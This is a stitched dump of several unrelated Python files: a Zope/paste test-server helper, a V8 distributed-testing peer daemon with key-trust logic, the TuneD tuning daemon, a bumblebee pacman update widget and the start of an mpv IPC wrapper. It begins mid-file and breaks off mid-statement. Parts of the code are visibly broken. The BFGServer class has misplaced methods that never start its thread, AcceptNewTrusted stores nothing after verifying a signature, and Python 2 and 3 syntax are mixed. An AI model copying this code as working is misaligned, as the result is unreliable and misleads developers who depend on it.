# disables Request/TestRequest/make_request.
# NOTE(review): zope.component/publisher/interface/annotation submodules are
# used without explicit imports — this relies on them being imported
# elsewhere before this module; confirm, since a failure here is swallowed.
try:
    import zope
    from zope.traversing.adapters import DefaultTraversable
    zope.component.provideAdapter(DefaultTraversable, [None])
    class Request(zope.publisher.browser.TestRequest):
        # Allow dict-style environ mutation on the test request.
        def __setitem__(self, name, value):
            self._environ[name] = value
    # alias
    TestRequest = Request
    def make_request(url='http://nohost/@@myview', form=None, *args, **kwargs):
        # Build an annotatable test request for the given URL/form.
        r = Request(environ={'SERVER_URL': url,
                             'ACTUAL_URL': url},
                    form=form,
                    *args, **kwargs)
        zope.interface.alsoProvides(
            r, zope.annotation.interfaces.IAttributeAnnotatable)
        return r
except Exception:
    pass
def pstriplist(s):
    """Print *s* with blank lines dropped and trailing whitespace stripped.

    Fixed: the Python 2 ``print`` statement is now a function call, which is
    valid on both Python 2 and Python 3.
    """
    print('\n'.join([a.rstrip() for a in s.split('\n') if a.strip()]))
# Shorthand for os.path.dirname, applied repeatedly below.
D = os.path.dirname
# Project root: six directory levels above this file — TODO confirm depth.
here_dir = D(D(D(D(D(D(os.path.abspath(__file__)))))))
def getApp():
    """Load and return the WSGI application described by etc/cgwb.ini."""
    return loadapp('config:etc/cgwb.ini', relative_to=here_dir)
def get_port():
    """Return a free TCP port on localhost, probing up to 30 random ports.

    Raises RuntimeError when no free port is found. Replaces the old
    py2.4-style nested try/try/finally and exception-driven control flow
    with socket.connect_ex (nonzero errno means nothing is listening, i.e.
    the port is free).
    """
    for _ in range(30):
        port = random.randrange(20000, 30000)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            if s.connect_ex(('localhost', port)) != 0:
                return port
        finally:
            s.close()
    raise RuntimeError("Can't find port")
class BFGServer:
    """Runs the WSGI app under paste's httpserver for tests.

    NOTE(review): ``server_close`` and ``mainloop`` sit at class level here
    but reference names (``self``, ``server_close``) as if they were meant to
    be nested inside ``launch`` — as written, the thread start lines live in
    ``mainloop``'s body and ``launch`` never starts the server thread.
    Confirm the intended indentation before relying on this class.
    """
    def launch(self, app=None, host='0.0.0.0'):
        """
        Some instances are registered here:
        - server: wsgi server
        - host: wsgi server host
        - port: wsgi server port
        - app: the Pylon wsgi application
        - t: the thread where the server is running in
        """
        if not app:
            app = getApp()
        self.app = app
        self.host = host
        self.port = get_port()
        # start_loop=False: serve_forever() is driven manually on a thread.
        self.server = serve(
            self.app,
            self.host, self.port,
            socket_timeout=1,
            start_loop=False,
        )
    def server_close(self):
        """
        Finish pending requests and shutdown the server.
        """
        # Bound onto self.server elsewhere, so ``self`` here is presumably
        # the paste server instance (see tearDown's explicit call).
        self.running = False
        self.socket.close()
        self.thread_pool.shutdown(1)
    def mainloop():
        """Handle requests."""
        self.server.server_close = server_close
        self.server.serve_forever()
        self.t = threading.Thread(target=mainloop)
        self.t.setDaemon(False)
        self.t.start()
    def get_url(self):
        # Base URL of the launched server.
        return 'http://%s:%s/' % (self.host, self.port)
    def tearDown(self):
        # Calls the replacement close function with the server as ``self``.
        self.server.server_close(self.server)
        self.t.join()
# Keeps every server started via launch_server() reachable for teardown.
_LAUNCHED_SERVERS = []
def launch_server():
    """Start a fresh BFGServer, remember it for teardown, return (server, url)."""
    srv = BFGServer()
    srv.launch()
    _LAUNCHED_SERVERS.append(srv)
    return srv, srv.get_url()
|
main.py | # Copyright 2012 the V8 project authors. All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from . import daemon
from . import local_handler
from . import presence_handler
from . import signatures
from . import status_handler
from . import work_handler
from ..network import perfdata
class Server(daemon.Daemon):
  """Distributed-testing peer daemon (Python 2 code).

  Runs four socket servers (local, work, status, presence discovery) on
  background threads, maintains a list of trusted peers, and tracks this
  machine's relative performance across runs."""
  def __init__(self, pidfile, root, stdin="/dev/null",
               stdout="/dev/null", stderr="/dev/null"):
    super(Server, self).__init__(pidfile, stdin, stdout, stderr)
    self.root = root
    self.local_handler = None
    self.local_handler_thread = None
    self.work_handler = None
    self.work_handler_thread = None
    self.status_handler = None
    self.status_handler_thread = None
    self.presence_daemon = None
    self.presence_daemon_thread = None
    self.peers = []
    self.jobs = multiprocessing.cpu_count()
    # Guards self.peers across handler threads.
    self.peer_list_lock = threading.Lock()
    self.perf_data_lock = None
    self.presence_daemon_lock = None
    self.datadir = os.path.join(self.root, "data")
    pubkey_fingerprint_filename = os.path.join(self.datadir, "mypubkey")
    with open(pubkey_fingerprint_filename) as f:
      self.pubkey_fingerprint = f.read().strip()
    # Persisted relative-performance estimate; defaults to 1.0 when the
    # file is missing or unreadable.
    self.relative_perf_filename = os.path.join(self.datadir, "myperf")
    if os.path.exists(self.relative_perf_filename):
      with open(self.relative_perf_filename) as f:
        try:
          self.relative_perf = float(f.read())
        except:
          self.relative_perf = 1.0
    else:
      self.relative_perf = 1.0
  def run(self):
    """Main daemon loop: start all handlers, discover peers, then run
    periodic maintenance until interrupted."""
    os.nice(20)
    self.ip = presence_handler.GetOwnIP()
    self.perf_data_manager = perfdata.PerfDataManager(self.datadir)
    self.perf_data_lock = threading.Lock()
    self.local_handler = local_handler.LocalSocketServer(self)
    self.local_handler_thread = threading.Thread(
        target=self.local_handler.serve_forever)
    self.local_handler_thread.start()
    self.work_handler = work_handler.WorkSocketServer(self)
    self.work_handler_thread = threading.Thread(
        target=self.work_handler.serve_forever)
    self.work_handler_thread.start()
    self.status_handler = status_handler.StatusSocketServer(self)
    self.status_handler_thread = threading.Thread(
        target=self.status_handler.serve_forever)
    self.status_handler_thread.start()
    self.presence_daemon = presence_handler.PresenceDaemon(self)
    self.presence_daemon_thread = threading.Thread(
        target=self.presence_daemon.serve_forever)
    self.presence_daemon_thread.start()
    self.presence_daemon.FindPeers()
    time.sleep(0.5)  # Give those peers some time to reply.
    with self.peer_list_lock:
      for p in self.peers:
        if p.address == self.ip: continue
        status_handler.RequestTrustedPubkeys(p, self)
    while True:
      try:
        self.PeriodicTasks()
        time.sleep(60)
      except Exception, e:
        print("MAIN LOOP EXCEPTION: %s" % e)
        self.Shutdown()
        break
      except KeyboardInterrupt:
        self.Shutdown()
        break
  def Shutdown(self):
    """Persist the performance estimate and stop all socket servers."""
    with open(self.relative_perf_filename, "w") as f:
      f.write("%s" % self.relative_perf)
    self.presence_daemon.shutdown()
    self.presence_daemon.server_close()
    self.local_handler.shutdown()
    self.local_handler.server_close()
    self.work_handler.shutdown()
    self.work_handler.server_close()
    self.status_handler.shutdown()
    self.status_handler.server_close()
  def PeriodicTasks(self):
    """Once-a-minute maintenance (currently: trust propagation)."""
    # If we know peers we don't trust, see if someone else trusts them.
    with self.peer_list_lock:
      for p in self.peers:
        if p.trusted: continue
        if self.IsTrusted(p.pubkey):
          p.trusted = True
          status_handler.ITrustYouNow(p)
          continue
        for p2 in self.peers:
          if not p2.trusted: continue
          status_handler.TryTransitiveTrust(p2, p.pubkey, self)
    # TODO: Ping for more peers waiting to be discovered.
    # TODO: Update the checkout (if currently idle).
  def AddPeer(self, peer):
    """Register a peer unless its address is already known."""
    with self.peer_list_lock:
      for p in self.peers:
        if p.address == peer.address:
          return
      self.peers.append(peer)
    if peer.trusted:
      status_handler.ITrustYouNow(peer)
  def DeletePeer(self, peer_address):
    """Remove the peer with the given address, if present."""
    with self.peer_list_lock:
      for i in xrange(len(self.peers)):
        if self.peers[i].address == peer_address:
          del self.peers[i]
          return
  def MarkPeerAsTrusting(self, peer_address):
    """Record that the given peer declared trust in us."""
    with self.peer_list_lock:
      for p in self.peers:
        if p.address == peer_address:
          p.trusting_me = True
          break
  def UpdatePeerPerformance(self, peer_address, performance):
    """Store the peer's self-reported relative performance."""
    with self.peer_list_lock:
      for p in self.peers:
        if p.address == peer_address:
          p.relative_performance = performance
  def CopyToTrusted(self, pubkey_filename):
    """Import a pubkey file into the trusted store and notify peers.

    The fingerprint is expected on the file's last line."""
    with open(pubkey_filename, "r") as f:
      lines = f.readlines()
      fingerprint = lines[-1].strip()
    target_filename = self._PubkeyFilename(fingerprint)
    shutil.copy(pubkey_filename, target_filename)
    with self.peer_list_lock:
      for peer in self.peers:
        if peer.address == self.ip: continue
        if peer.pubkey == fingerprint:
          status_handler.ITrustYouNow(peer)
        else:
          result = self.SignTrusted(fingerprint)
          status_handler.NotifyNewTrusted(peer, result)
    return fingerprint
  def _PubkeyFilename(self, pubkey_fingerprint):
    # Trusted keys live as <fingerprint>.pem under root/trusted.
    return os.path.join(self.root, "trusted", "%s.pem" % pubkey_fingerprint)
  def IsTrusted(self, pubkey_fingerprint):
    """A key is trusted iff its .pem exists in the trusted store."""
    return os.path.exists(self._PubkeyFilename(pubkey_fingerprint))
  def ListTrusted(self):
    """Return the fingerprints of all trusted keys."""
    path = os.path.join(self.root, "trusted")
    if not os.path.exists(path): return []
    return [ f[:-4] for f in os.listdir(path) if f.endswith(".pem") ]
  def SignTrusted(self, pubkey_fingerprint):
    """Sign a trusted key for transitive-trust announcements."""
    if not self.IsTrusted(pubkey_fingerprint):
      return []
    filename = self._PubkeyFilename(pubkey_fingerprint)
    result = signatures.ReadFileAndSignature(filename)  # Format: [key, sig].
    return [pubkey_fingerprint, result[0], result[1], self.pubkey_fingerprint]
  def AcceptNewTrusted(self, data):
    """Validate a transitive-trust announcement from a trusted signer.

    NOTE(review): after the signature verifies, nothing is persisted — the
    announced key never enters the trusted store here; confirm whether a
    copy step is missing."""
    # The format of |data| matches the return value of |SignTrusted()|.
    if not data: return
    fingerprint = data[0]
    pubkey = data[1]
    signature = data[2]
    signer = data[3]
    if not self.IsTrusted(signer):
      return
    if self.IsTrusted(fingerprint):
      return  # Already trusted.
    filename = self._PubkeyFilename(fingerprint)
    signer_pubkeyfile = self._PubkeyFilename(signer)
    if not signatures.VerifySignature(filename, pubkey, signature,
                                      signer_pubkeyfile):
      return
    return  # Nothing more to do.
  def AddPerfData(self, test_key, duration, arch, mode):
    """Record one test duration in the per-arch/mode perf store."""
    data_store = self.perf_data_manager.GetStore(arch, mode)
    data_store.RawUpdatePerfData(str(test_key), duration)
  def CompareOwnPerf(self, test, arch, mode):
    """Blend one observed/actual duration ratio into relative_perf
    (exponential moving average with a very slow learn rate)."""
    data_store = self.perf_data_manager.GetStore(arch, mode)
    observed = data_store.FetchPerfData(test)
    if not observed: return
    own_perf_estimate = observed / test.duration
    with self.perf_data_lock:
      kLearnRateLimiter = 9999
      self.relative_perf *= kLearnRateLimiter
      self.relative_perf += own_perf_estimate
      self.relative_perf /= (kLearnRateLimiter + 1)
|
daemon.py | import os
import errno
import threading
import tuned.logs
from tuned.exceptions import TunedException
from tuned.profiles.exceptions import InvalidProfileException
import tuned.consts as consts
from tuned.utils.commands import commands
from tuned import exports
from tuned.utils.profile_recommender import ProfileRecommender
import re
log = tuned.logs.get()
class Daemon(object):
	"""Core TuneD daemon.

	Loads tuning profiles, runs the background tuning thread, and handles
	profile switching plus rollback of tunings on shutdown.
	"""
	def __init__(self, unit_manager, profile_loader, profile_names=None, config=None, application=None):
		log.debug("initializing daemon")
		# Defaults; may be overridden from the global config below.
		self._daemon = consts.CFG_DEF_DAEMON
		self._sleep_interval = int(consts.CFG_DEF_SLEEP_INTERVAL)
		self._update_interval = int(consts.CFG_DEF_UPDATE_INTERVAL)
		self._dynamic_tuning = consts.CFG_DEF_DYNAMIC_TUNING
		self._recommend_command = True
		if config is not None:
			self._daemon = config.get_bool(consts.CFG_DAEMON, consts.CFG_DEF_DAEMON)
			self._sleep_interval = int(config.get(consts.CFG_SLEEP_INTERVAL, consts.CFG_DEF_SLEEP_INTERVAL))
			self._update_interval = int(config.get(consts.CFG_UPDATE_INTERVAL, consts.CFG_DEF_UPDATE_INTERVAL))
			self._dynamic_tuning = config.get_bool(consts.CFG_DYNAMIC_TUNING, consts.CFG_DEF_DYNAMIC_TUNING)
			self._recommend_command = config.get_bool(consts.CFG_RECOMMEND_COMMAND, consts.CFG_DEF_RECOMMEND_COMMAND)
		self._application = application
		# Sanitize intervals: sleep interval must be positive; an update
		# interval of 0 disables dynamic tuning entirely, and the update
		# interval can never be shorter than the sleep interval.
		if self._sleep_interval <= 0:
			self._sleep_interval = int(consts.CFG_DEF_SLEEP_INTERVAL)
		if self._update_interval == 0:
			self._dynamic_tuning = False
		elif self._update_interval < self._sleep_interval:
			self._update_interval = self._sleep_interval
		self._sleep_cycles = self._update_interval // self._sleep_interval
		log.info("using sleep interval of %d second(s)" % self._sleep_interval)
		if self._dynamic_tuning:
			log.info("dynamic tuning is enabled (can be overridden by plugins)")
			log.info("using update interval of %d second(s) (%d times of the sleep interval)" % (self._sleep_cycles * self._sleep_interval, self._sleep_cycles))
		self._profile_recommender = ProfileRecommender(is_hardcoded = not self._recommend_command)
		self._unit_manager = unit_manager
		self._profile_loader = profile_loader
		self._init_threads()
		self._cmd = commands()
		try:
			self._init_profile(profile_names)
		except TunedException as e:
			log.error("Cannot set initial profile. No tunings will be enabled: %s" % e)
	def _init_threads(self):
		"""Initialize the tuning thread handle and its coordination events."""
		self._thread = None
		self._terminate = threading.Event()
		# Flag which is set if terminating due to profile_switch
		self._terminate_profile_switch = threading.Event()
		# Flag which is set if there is no operation in progress
		self._not_used = threading.Event()
		self._not_used.set()
		self._profile_applied = threading.Event()
	def reload_profile_config(self):
		"""Read configuration files again and load profile according to them"""
		self._init_profile(None)
	def _init_profile(self, profile_names):
		"""Determine and load the initial profile(s).

		profile_names of None means "use the saved/recommended profile";
		an empty string means "enable no profile".
		"""
		manual = True
		post_loaded_profile = self._cmd.get_post_loaded_profile()
		if profile_names is None:
			(profile_names, manual) = self._get_startup_profile()
			if profile_names is None:
				msg = "No profile is preset, running in manual mode. "
				if post_loaded_profile:
					msg += "Only post-loaded profile will be enabled"
				else:
					msg += "No profile will be enabled."
				log.info(msg)
		# Passed through '-p' cmdline option
		elif profile_names == "":
			if post_loaded_profile:
				log.info("Only post-loaded profile will be enabled")
			else:
				log.info("No profile will be enabled.")
		self._profile = None
		self._manual = None
		self._active_profiles = []
		self._post_loaded_profile = None
		self.set_all_profiles(profile_names, manual, post_loaded_profile)
	def _load_profiles(self, profile_names, manual):
		"""Load the merged profile for the given (space-separated) names,
		appending the post-loaded profile if one is set.

		Raises TunedException (after emitting a change notification) when a
		profile is unknown or fails to load.
		"""
		profile_names = profile_names or ""
		profile_list = profile_names.split()
		if self._post_loaded_profile:
			log.info("Using post-loaded profile '%s'"
				 % self._post_loaded_profile)
			profile_list = profile_list + [self._post_loaded_profile]
		for profile in profile_list:
			if profile not in self.profile_loader.profile_locator.get_known_names():
				errstr = "Requested profile '%s' doesn't exist." % profile
				self._notify_profile_changed(profile_names, False, errstr)
				raise TunedException(errstr)
		try:
			if profile_list:
				self._profile = self._profile_loader.load(profile_list)
			else:
				self._profile = None
			self._manual = manual
			self._active_profiles = profile_names.split()
		except InvalidProfileException as e:
			errstr = "Cannot load profile(s) '%s': %s" % (" ".join(profile_list), e)
			self._notify_profile_changed(profile_names, False, errstr)
			raise TunedException(errstr)
	def set_profile(self, profile_names, manual):
		"""Load new active profile(s); only allowed while tuning is stopped."""
		if self.is_running():
			errstr = "Cannot set profile while the daemon is running."
			self._notify_profile_changed(profile_names, False,
				errstr)
			raise TunedException(errstr)
		self._load_profiles(profile_names, manual)
	def _set_post_loaded_profile(self, profile_name):
		"""Validate and store the (single) post-loaded profile name."""
		if not profile_name:
			self._post_loaded_profile = None
		elif len(profile_name.split()) > 1:
			errstr = "Whitespace is not allowed in profile names; only a single post-loaded profile is allowed."
			raise TunedException(errstr)
		else:
			self._post_loaded_profile = profile_name
	def set_all_profiles(self, active_profiles, manual, post_loaded_profile,
			     save_instantly=False):
		"""Set active and post-loaded profiles; only while tuning is stopped.

		With save_instantly the selection is persisted immediately instead
		of when the tuning thread starts.
		"""
		if self.is_running():
			errstr = "Cannot set profile while the daemon is running."
			self._notify_profile_changed(active_profiles, False,
				errstr)
			raise TunedException(errstr)
		self._set_post_loaded_profile(post_loaded_profile)
		self._load_profiles(active_profiles, manual)
		if save_instantly:
			self._save_active_profile(active_profiles, manual)
			self._save_post_loaded_profile(post_loaded_profile)
	@property
	def profile(self):
		return self._profile
	@property
	def manual(self):
		return self._manual
	@property
	def post_loaded_profile(self):
		# Return the profile name only if the profile is active. If
		# the profile is not active, then the value is meaningless.
		return self._post_loaded_profile if self._profile else None
	@property
	def profile_recommender(self):
		return self._profile_recommender
	@property
	def profile_loader(self):
		return self._profile_loader
	# Send a notification when the profile has changed (everything is set up)
	# or if an error occurred.
	# result: True - OK, False - an error occurred
	def _notify_profile_changed(self, profile_names, result, errstr):
		if self._application is not None and self._application._dbus_exporter is not None:
			self._application._dbus_exporter.send_signal(consts.DBUS_SIGNAL_PROFILE_CHANGED, profile_names, result, errstr)
		return errstr
	def _full_rollback_required(self):
		"""Return True when we are NOT in a system shutdown/reboot, i.e. the
		daemon was stopped explicitly and a full tunings rollback is wanted."""
		retcode, out = self._cmd.execute(["systemctl", "is-system-running"], no_errors = [0])
		if retcode < 0:
			# systemctl not available: without systemd never do full cleanup.
			return False
		if out[:8] == "stopping":
			return False
		retcode, out = self._cmd.execute(["systemctl", "list-jobs"], no_errors = [0])
		return re.search(r"\b(shutdown|reboot|halt|poweroff)\.target.*start", out) is None and not retcode
	def _thread_code(self):
		"""Body of the tuning thread: apply the profile, optionally run the
		dynamic-tuning loop until terminated, then roll back tunings."""
		if self._profile is None:
			raise TunedException("Cannot start the daemon without setting a profile.")
		self._unit_manager.create(self._profile.units)
		self._save_active_profile(" ".join(self._active_profiles),
					  self._manual)
		self._save_post_loaded_profile(self._post_loaded_profile)
		self._unit_manager.start_tuning()
		self._profile_applied.set()
		log.info("static tuning from profile '%s' applied" % self._profile.name)
		if self._daemon:
			exports.start()
		profile_names = " ".join(self._active_profiles)
		self._notify_profile_changed(profile_names, True, "OK")
		if self._daemon:
			# In python 2 interpreter with applied patch for rhbz#917709 we need to periodically
			# poll, otherwise the python will not have chance to update events / locks (due to GIL)
			# and e.g. DBus control will not work. The polling interval of 1 seconds (which is
			# the default) is still much better than 50 ms polling with unpatched interpreter.
			# For more details see TuneD rhbz#917587.
			_sleep_cnt = self._sleep_cycles
			while not self._cmd.wait(self._terminate, self._sleep_interval):
				if self._dynamic_tuning:
					_sleep_cnt -= 1
					if _sleep_cnt <= 0:
						# One full update interval elapsed.
						_sleep_cnt = self._sleep_cycles
						log.debug("updating monitors")
						self._unit_manager.update_monitors()
						log.debug("performing tunings")
						self._unit_manager.update_tuning()
		self._profile_applied.clear()
		# wait for others to complete their tasks, use timeout 3 x sleep_interval to prevent
		# deadlocks
		i = 0
		while not self._cmd.wait(self._not_used, self._sleep_interval) and i < 3:
			i += 1
		# if terminating due to profile switch
		if self._terminate_profile_switch.is_set():
			full_rollback = True
		else:
			# with systemd it detects system shutdown and in such case it doesn't perform
			# full cleanup, if not shutting down it means that TuneD was explicitly
			# stopped by user and in such case do full cleanup, without systemd never
			# do full cleanup
			full_rollback = False
			if self._full_rollback_required():
				if self._daemon:
					log.info("terminating TuneD, rolling back all changes")
					full_rollback = True
				else:
					log.info("terminating TuneD in one-shot mode")
			else:
				log.info("terminating TuneD due to system shutdown / reboot")
		if self._daemon:
			self._unit_manager.stop_tuning(full_rollback)
		self._unit_manager.destroy_all()
	def _save_active_profile(self, profile_names, manual):
		"""Persist the active profile selection; log (don't raise) on failure."""
		try:
			self._cmd.save_active_profile(profile_names, manual)
		except TunedException as e:
			log.error(str(e))
	def _save_post_loaded_profile(self, profile_name):
		"""Persist the post-loaded profile name; log (don't raise) on failure."""
		try:
			self._cmd.save_post_loaded_profile(profile_name)
		except TunedException as e:
			log.error(str(e))
	def _get_recommended_profile(self):
		"""Ask the profile recommender which profile fits this system."""
		log.info("Running in automatic mode, checking what profile is recommended for your configuration.")
		profile = self._profile_recommender.recommend()
		log.info("Using '%s' profile" % profile)
		return profile
	def _get_startup_profile(self):
		"""Return (profile_names, manual) to use at startup: the saved
		selection, or the recommended profile in automatic mode."""
		profile, manual = self._cmd.get_active_profile()
		if manual is None:
			# No explicit mode saved: treat a saved profile as manual.
			manual = profile is not None
		if not manual:
			profile = self._get_recommended_profile()
		return profile, manual
	def get_all_plugins(self):
		"""Return all accessible plugin classes"""
		return self._unit_manager.plugins_repository.load_all_plugins()
	def get_plugin_documentation(self, plugin_name):
		"""Return plugin class docstring"""
		try:
			plugin_class = self._unit_manager.plugins_repository.load_plugin(
				plugin_name
			)
		except ImportError:
			return ""
		return plugin_class.__doc__
	def get_plugin_hints(self, plugin_name):
		"""Return plugin's parameters and their hints

		Parameters:
		plugin_name -- plugin name

		Return:
		dictionary -- {parameter_name: hint}
		"""
		try:
			plugin_class = self._unit_manager.plugins_repository.load_plugin(
				plugin_name
			)
		except ImportError:
			return {}
		return plugin_class.get_config_options_hints()
	def is_enabled(self):
		"""Return True when a profile is loaded."""
		return self._profile is not None
	def is_running(self):
		"""Return True while the tuning thread is alive."""
		return self._thread is not None and self._thread.is_alive()
	def start(self):
		"""Start the tuning thread; returns False if already running or no
		profile is set."""
		if self.is_running():
			return False
		if self._profile is None:
			return False
		log.info("starting tuning")
		self._not_used.set()
		self._thread = threading.Thread(target=self._thread_code)
		self._terminate_profile_switch.clear()
		self._terminate.clear()
		self._thread.start()
		return True
	def verify_profile(self, ignore_missing):
		"""Verify that the applied profile matches the system state.

		Returns the verification result, or False when the daemon is not
		running / no profile is set / the profile is not yet applied.
		"""
		if not self.is_running():
			log.error("TuneD is not running")
			return False
		if self._profile is None:
			log.error("no profile is set")
			return False
		if not self._profile_applied.is_set():
			log.error("profile is not applied")
			return False
		# when running as a daemon, the main loop mustn't exit before our completion
		self._not_used.clear()
		log.info("verifying profile(s): %s" % self._profile.name)
		ret = self._unit_manager.verify_tuning(ignore_missing)
		# main loop is allowed to exit
		self._not_used.set()
		return ret
	# profile_switch is helper telling plugins whether the stop is due to profile switch
	def stop(self, profile_switch = False):
		"""Signal the tuning thread to terminate and wait for it to finish."""
		if not self.is_running():
			return False
		log.info("stopping tuning")
		if profile_switch:
			self._terminate_profile_switch.set()
		self._terminate.set()
		self._thread.join()
		self._thread = None
		return True
|
pacman.py | # pylint: disable=C0111,R0903
"""Displays update information per repository for pacman."
Requires the following executables:
* fakeroot
* pacman
"""
import os
import threading
import bumblebee.input
import bumblebee.output
import bumblebee.engine
# List of repositories.
# The last one should always be "other".
repos = ["core", "extra", "community", "multilib", "testing", "other"]

def get_pacman_info(widget, path):
    """Count pending pacman updates per repository and store them on widget.

    Runs the bundled ``pacman-updates`` helper and tallies one counter per
    entry in ``repos``; update URLs that match no named repository are
    attributed to the final "other" bucket.
    """
    try:
        result = bumblebee.util.execute("{}/../../bin/pacman-updates".format(path))
    except Exception:
        # Bug fix: the original swallowed the error and then crashed with an
        # unbound `result`; fall back to "no output" -> all counters zero.
        result = ""
    count = len(repos)*[0]
    for line in result.splitlines():
        if line.startswith(("http", "rsync")):
            for i in range(len(repos)-1):
                if "/" + repos[i] + "/" in line:
                    count[i] += 1
                    break
            else:
                # Bug fix: was `result[-1] += 1`, which indexes the output
                # string and raises TypeError; the "other" counter was meant.
                count[-1] += 1
    for i in range(len(repos)):
        widget.set(repos[i], count[i])
class Module(bumblebee.engine.Module):
    """Bumblebee status-bar widget showing pending pacman updates per repo."""
    def __init__(self, engine, config):
        super(Module, self).__init__(engine, config,
            bumblebee.output.Widget(full_text=self.updates)
        )
        # Tick counter; a refresh thread is spawned whenever it wraps to 0.
        self._count = 0
    def updates(self, widget):
        """Render the per-repository counts as "core/extra/.../other"."""
        return '/'.join(map(lambda x: str(widget.get(x,0)), repos))
    def update(self, widgets):
        """Kick off a background refresh roughly every 300 update cycles."""
        path = os.path.dirname(os.path.abspath(__file__))
        if self._count == 0:
            thread = threading.Thread(target=get_pacman_info, args=(widgets[0],path))
            thread.start()
        # TODO: improve this waiting mechanism a bit
        self._count += 1
        self._count = 0 if self._count > 300 else self._count
    def state(self, widget):
        """Pick a severity state, weighting core repos higher than "other"."""
        # threshold_state comes from the bumblebee.engine.Module base class —
        # presumably maps the weighted count to warning/critical; confirm upstream.
        weightedCount = sum(map(lambda x: (len(repos)-x[0]) * widget.get(x[1],0), enumerate(repos)))
        if weightedCount < 10:
            return "good"
        return self.threshold_state(weightedCount, 100, 150)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
|
mpv.py | # coding: utf-8
# ------------------------------------------------------------------------------
#
# mpv.py - Control mpv from Python using JSON IPC
#
# Copyright (c) 2015 Lars Gustäbel <lars@gustaebel.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# ------------------------------------------------------------------------------
import sys
import os
import time
import json
import socket
import select
import tempfile
import threading
import subprocess
import inspect
from distutils.spawn import find_executable
from queue import Queue, Empty, Full
class MPVError(Exception):
    """Base class for all errors raised by this mpv IPC module."""
    pass
class MPVProcessError(MPVError):
    """The mpv process could not be started or has died."""
    pass
class MPVCommunicationError(MPVError):
    """The socket/pipe protocol with mpv broke down."""
    pass
class MPVCommandError(MPVError):
    """mpv reported an error in response to a command."""
    pass
class MPVTimeoutError(MPVError):
    """A request to or response from mpv timed out."""
    pass
from anki.utils import isWin
if isWin:
    # Windows has no unix sockets; mpv is reached via a named pipe instead.
    import win32file, win32pipe, pywintypes, winerror
class MPVBase:
    """Base class for communication with the mpv media player via unix socket
       based JSON IPC.
    """
    executable = find_executable("mpv")
    popenEnv = None
    # Arguments passed to every mpv process we spawn.
    default_argv = [
        "--idle",
        "--no-terminal",
        "--force-window=no",
        "--ontop",
        "--audio-display=no",
        "--input-media-keys=no",
    ]
    def __init__(self, window_id=None, debug=False):
        self.window_id = window_id
        self.debug = debug
        # Order matters: socket path first, then process, then connect,
        # then the reader thread.
        self._prepare_socket()
        self._prepare_process()
        self._start_process()
        self._start_socket()
        self._prepare_thread()
        self._start_thread()
    def __del__(self):
        self._stop_thread()
        self._stop_process()
        self._stop_socket()
    def _thread_id(self):
        # Used to key per-thread response queues.
        return threading.get_ident()
    #
    # Process
    #
    def _prepare_process(self):
        """Prepare the argument list for the mpv process.
        """
        self.argv = [self.executable]
        self.argv += self.default_argv
        self.argv += ["--input-ipc-server", self._sock_filename]
        if self.window_id is not None:
            self.argv += ["--wid", str(self.window_id)]
    def _start_process(self):
        """Start the mpv process.
        """
        self._proc = subprocess.Popen(self.argv, env=self.popenEnv)
    def _stop_process(self):
        """Stop the mpv process.
        """
        if hasattr(self, "_proc"):
            try:
                self._proc.terminate()
                self._proc.wait()
            except ProcessLookupError:
                # Process already gone.
                pass
    #
    # Socket communication
    #
    def _prepare_socket(self):
        """Create a random socket filename which we pass to mpv with the
           --input-unix-socket option.
        """
        if isWin:
            # Fixed named-pipe name on Windows.
            self._sock_filename = "ankimpv"
            return
        fd, self._sock_filename = tempfile.mkstemp(prefix="mpv.")
        os.close(fd)
        # mpv creates the socket itself; we only reserved a unique path.
        os.remove(self._sock_filename)
    def _start_socket(self):
        """Wait for the mpv process to create the unix socket and finish
           startup.
        """
        start = time.time()
        # Retry connecting for up to 10 seconds while mpv starts up;
        # the while/else raises if we never manage to connect.
        while self.is_running() and time.time() < start+10:
            time.sleep(0.1)
            if isWin:
                # named pipe
                try:
                    self._sock = win32file.CreateFile(r'\\.\pipe\ankimpv',
